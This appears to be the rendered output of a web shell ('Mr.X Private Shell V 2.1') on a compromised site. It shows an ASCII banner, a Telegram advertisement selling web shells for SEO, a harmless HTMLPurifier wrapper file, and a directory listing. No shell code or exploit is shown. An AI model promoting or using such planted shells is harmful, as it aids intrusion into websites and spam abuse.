__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @file
* Defines a function wrapper for HTML Purifier for quick use.
* @note ''HTMLPurifier()'' is NOT the same as ''new HTMLPurifier()''
*/
/**
* Purify HTML.
* @param string $html String HTML to purify
* @param mixed $config Configuration to use, can be any value accepted by
* HTMLPurifier_Config::create()
* @return string
*/
function HTMLPurifier($html, $config = null)
{
static $purifier = false;
if (!$purifier) {
$purifier = new HTMLPurifier();
}
return $purifier->purify($html, $config);
}
// vim: et sw=4 sts=4
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| HTMLPurifier | Folder | 0755 |
|
|
| HTMLPurifier.auto.php | File | 274 B | 0644 |
|
| HTMLPurifier.autoload-legacy.php | File | 213 B | 0644 |
|
| HTMLPurifier.autoload.php | File | 910 B | 0644 |
|
| HTMLPurifier.composer.php | File | 101 B | 0644 |
|
| HTMLPurifier.func.php | File | 576 B | 0644 |
|
| HTMLPurifier.includes.php | File | 10.33 KB | 0644 |
|
| HTMLPurifier.kses.php | File | 923 B | 0644 |
|
| HTMLPurifier.path.php | File | 235 B | 0644 |
|
| HTMLPurifier.php | File | 9.95 KB | 0644 |
|
| HTMLPurifier.safe-includes.php | File | 13.26 KB | 0644 |
|